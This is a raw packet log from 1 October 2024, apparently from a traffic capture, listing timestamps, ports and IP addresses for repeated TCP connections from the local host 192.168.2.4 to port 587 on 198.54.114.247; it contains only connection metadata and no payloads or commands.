Oct 1, 2024 06:18:16.194952965 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.201585054 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:16.206409931 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.360744953 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.362251043 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:16.367024899 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.526688099 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.527070999 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:16.534567118 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.688642979 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.689765930 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:16.695261002 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.867480040 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.867887020 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:16.872725964 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.027092934 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.027262926 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:17.032011986 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.200095892 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.200265884 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:17.205528975 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.361798048 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.362052917 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:17.362096071 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:17.362162113 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:17.362190962 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:17.368083000 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.368093967 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.369169950 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.862778902 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.862837076 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:17.862880945 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:17.863440037 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:17.868180037 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:18.023863077 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:18.028548002 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:18.030380964 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:18.035180092 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:18.035782099 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:18.755897999 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:18.765099049 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:18.769867897 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:18.924808979 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:18.925031900 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:18.929820061 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.087748051 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.088100910 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:19.092885017 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.334736109 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.334753990 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.334810019 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:19.334817886 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.334861040 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.334871054 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.334897041 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:19.421585083 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.421648026 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:19.422683954 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:19.427428961 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.582356930 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.583237886 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:19.588125944 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.742641926 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.742814064 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:19.747648001 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.903651953 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:19.903884888 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:19.908715010 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.084173918 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.088078022 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.092961073 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.247559071 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.251966953 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.256814957 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.438529968 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.440273046 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.445094109 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.605171919 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.608381987 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.608408928 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.608408928 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.608434916 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.613290071 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.613296032 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.613305092 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.613328934 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.810538054 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.813606024 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.818464041 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.977785110 CEST	587	50451	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.979621887 CEST	50451	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.980632067 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:20.985595942 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:20.985776901 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:21.544050932 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:21.544182062 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:21.548988104 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:21.704247952 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:21.704395056 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:21.709203005 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:21.867134094 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:21.867443085 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:21.872231007 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.061695099 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.061712980 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.061718941 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.061815023 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.061821938 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:22.061918974 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:22.150178909 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.153604031 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:22.158420086 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.315817118 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.316515923 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:22.321322918 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.476520061 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.477593899 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:22.482388973 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.638922930 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.641846895 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:22.646667957 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.817034006 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.817734957 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:22.822660923 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.982878923 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:22.983108997 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:22.987962961 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.172996044 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.173157930 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:23.177957058 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.333626032 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.333969116 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:23.334042072 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:23.334100962 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:23.334134102 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:23.338845015 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.338854074 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.338967085 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.338977098 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.627968073 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.628524065 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:23.634076118 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.984081030 CEST	587	50452	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.984532118 CEST	50452	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:23.985621929 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:23.990498066 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:23.990570068 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:24.548228979 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:24.549719095 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:24.554547071 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:24.713196039 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:24.713695049 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:24.718461990 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:24.888272047 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:24.888932943 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:24.893737078 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.070838928 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.070857048 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.070868015 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.070880890 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.070904970 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:25.070925951 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:25.159087896 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.161539078 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:25.166366100 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.323462009 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.324450970 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:25.329289913 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.486588955 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.486780882 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:25.491594076 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.659085989 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.659256935 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:25.664061069 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.832185984 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.832396984 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:25.837240934 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.994479895 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:25.994640112 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:26.001132011 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.177695036 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.177865028 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:26.182671070 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.340363026 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.341823101 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:26.341931105 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:26.341968060 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:26.341968060 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:26.346648932 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.346688986 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.346817970 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.346823931 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.578253031 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.582011938 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:26.586776972 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.745568991 CEST	587	50453	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.749890089 CEST	50453	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:26.753591061 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:26.758378029 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:26.758621931 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:27.318272114 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:27.318461895 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:27.613176107 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:27.613188982 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:27.613221884 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:27.767788887 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:27.767929077 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:27.772761106 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:27.928976059 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:27.929435968 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:27.934223890 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.109713078 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.109725952 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.109733105 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.109739065 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.109884977 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:28.196372986 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.198772907 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:28.203613043 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.359056950 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.359908104 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:28.364773035 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.520297050 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.520685911 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:28.525523901 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.684163094 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.685069084 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:28.689798117 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.866349936 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:28.866627932 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:28.871483088 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.026613951 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.026931047 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:29.031788111 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.218578100 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.218739033 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:29.223584890 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.378716946 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.379060984 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:29.379092932 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:29.379113913 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:29.379132032 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:29.384968996 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.384979010 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.385380983 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.652669907 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:29.653111935 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:29.657946110 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:30.733675957 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:30.733900070 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:30.733948946 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:30.733999968 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:30.733999968 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:30.734098911 CEST	587	50454	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:30.734165907 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:30.734246969 CEST	50454	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:30.734946966 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:30.739788055 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:30.739871025 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:31.335994005 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.336153984 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:31.341012955 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.520083904 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.520220995 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:31.525167942 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.706887960 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.707233906 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:31.712153912 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.907517910 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.907532930 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.907542944 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.907557964 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:31.907592058 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:31.907644033 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:32.000475883 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.002167940 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:32.007057905 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.187494993 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.190208912 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:32.195014954 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.374259949 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.377770901 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:32.382693052 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.563400984 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.565857887 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:32.571105957 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.779206991 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.779567957 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:32.784389973 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.963009119 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:32.965245962 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:32.970164061 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.174180984 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.174411058 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:33.179291964 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.358159065 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.360769987 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:33.360842943 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:33.360869884 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:33.360928059 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:33.365669012 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.365698099 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.365819931 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.365830898 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.548886061 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.549405098 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:33.554374933 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.738049984 CEST	587	50455	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.738435030 CEST	50455	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:33.739487886 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:33.744328976 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:33.744389057 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:34.294301987 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:34.297724962 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:34.302644014 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:34.457271099 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:34.457717896 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:34.462526083 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:34.919779062 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:34.921879053 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:34.926708937 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.123311043 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.123336077 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.123353004 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.123369932 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.123378992 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:35.123431921 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:35.209676981 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.211673021 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:35.216759920 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.371154070 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.372143030 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:35.377024889 CEST	587	50456	198.54.114.247	192.168.2.4
